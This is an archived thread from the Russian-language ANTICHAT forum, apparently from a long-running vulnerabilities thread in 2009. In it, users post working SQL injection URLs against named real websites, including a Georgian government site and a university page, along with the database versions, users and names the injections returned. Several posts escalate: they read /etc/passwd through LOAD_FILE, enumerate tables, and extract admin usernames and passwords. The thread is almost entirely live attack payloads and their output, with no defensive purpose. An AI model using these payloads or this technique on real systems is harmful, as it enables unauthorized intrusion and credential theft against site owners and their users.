ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8661  
Старый 01.04.2009, 00:19
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR6
http://www.bridgesventures.com/news.php?newsID=54+AND+SUBSTRING((y() ),1,1)=x--/*



y1=version
y2=database
y3=user

x=Version : 3.23.49
Database : db2780
User : mysql2780@websrv5.netbenefit.co.uk
 
Ответить с цитированием

  #8662  
Старый 01.04.2009, 01:05
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

pr4@5.0.37-standard-log
Код:
http://www.phoneslimited.co.uk/description.php?id=10802+union+select+version()/*
 
Ответить с цитированием

  #8663  
Старый 01.04.2009, 01:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5
http://www.asociatiait.ro/comunicate.php?NewsId=-36+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20/*


Database Version: 4.1.22-log
Database name: apdetic
User name: apdetic@localhost
 
Ответить с цитированием

  #8664  
Старый 01.04.2009, 02:08
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

www.azw.at

Код:
http://www.azw.at/item.php?item_id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17,18--+
юзер/версия/бд:

Код:
	  nr00649_adm@localhost:5.0.32-Debian_7etch8-log:nr00649_db
 
Ответить с цитированием

  #8665  
Старый 01.04.2009, 11:23
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5
http://www.nationmultimedia.com/breakingnews/read.php?newsid=-30082501+union+select+1,convert(concat_ws(0x3a,ver sion(),database(),user())+using+binary),3,4,5,6,7, 8,9,10,11,12,13,14



Database Version: 4.1.7-log
Database name: nationnews
User name: nation01@192.168.52.56
 
Ответить с цитированием

  #8666  
Старый 01.04.2009, 12:55
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

С первым апреля!!! Наконец я дома!

Код:
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
glenridge@localhost:q3stats:5.0.51a-3ubuntu5.4-log

Код:
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php
/etc/passwd
file_priv=Y

Код:
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
root@localhost:statq3cpma:5.0.45

Код:
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php
/etc/passwd
file_priv=Y

Код:
stats.ef-clan.org/fragland/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
fragland@cyberwebserver-21.de:fragland:5.0.32-Debian_7etch8-log

Код:
play.fuzzy76.net/statistics/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.67-0ubuntu6

Код:
objstats.tce-massa.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
obj0307@localhostbj0307:5.0.60-log

Код:
western.bsdmon.com/vsp/pub/themes/westernq3/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@localhost:westernvsp_dm:5.0.51

Код:
gry.isko.net.pl/statystyki/et27980/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vspet27980@localhost:vsp27980:5.0.54-log
 
Ответить с цитированием

  #8667  
Старый 01.04.2009, 13:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR4
http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9


Version : 4.1.22-community
Database : db2522
Use : c2172@ns104.fastdnsservers.com



http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,username,userpa ssword),4,5,6,7,8,9+from+admin
 
Ответить с цитированием

  #8668  
Старый 01.04.2009, 15:03
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

Цитата:
http://www.ls.huji.ac.il/grulabs/member.php?id=-1+union+select+concat_ws(0x3a3a20203a3a,version(), database(),user()),2,3,4,5,6,7
version: 4.1.22-community-max-nt-log
database: inglor_fb
user: inglor@ktalav.cc.huji.ac.il


___________________

Department of tourism and Resorts of Georgia


Цитата:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,versio n(),user(),database()),7,8

version: 5.0.67-community
database: dotrgovg_tourism
user: dotrgovg@localhost

all tables:

Цитата:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8+from+infor mation_schema.tables
user:
Цитата:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,column_name,7,8+from+info rmation_schema.columns+where+table_name='user'
admin:

Цитата:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,name,7,8+from+user--
name: admin
password: *********

admin panel:

Цитата:
http://www.dotr.gov.ge/

Последний раз редактировалось erihtoney; 01.04.2009 в 16:24.. Причина: Нехорошо
 
Ответить с цитированием

  #8669  
Старый 01.04.2009, 15:42
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5
два сайта на одной бд

http://www.yourcommunicationnews.com/news_item.php?newsID=11176+AND+SUBSTRING((y()),1,1)=x


http://www.yourindustrynews.com/index.php?region=1+AND+SUBSTRING((y() ),1,1)=x



y1=version
y2=database
y3=user

x=Version : 5.0.51
Database : db_YourIndustryNews
User : eastcoast@localhost
 
Ответить с цитированием

  #8670  
Старый 01.04.2009, 18:45
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.vipaspa.it/de/news_scheda.php?idn=-1+union+all+select+0,convert(user()+using+latin1),convert(version()+using+latin1),convert(database()+using+latin1),4--+
юзер/версия/бд:
Код:
dbvipa@66.71.190.34:4.1.16-standard-log:530220vipa
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ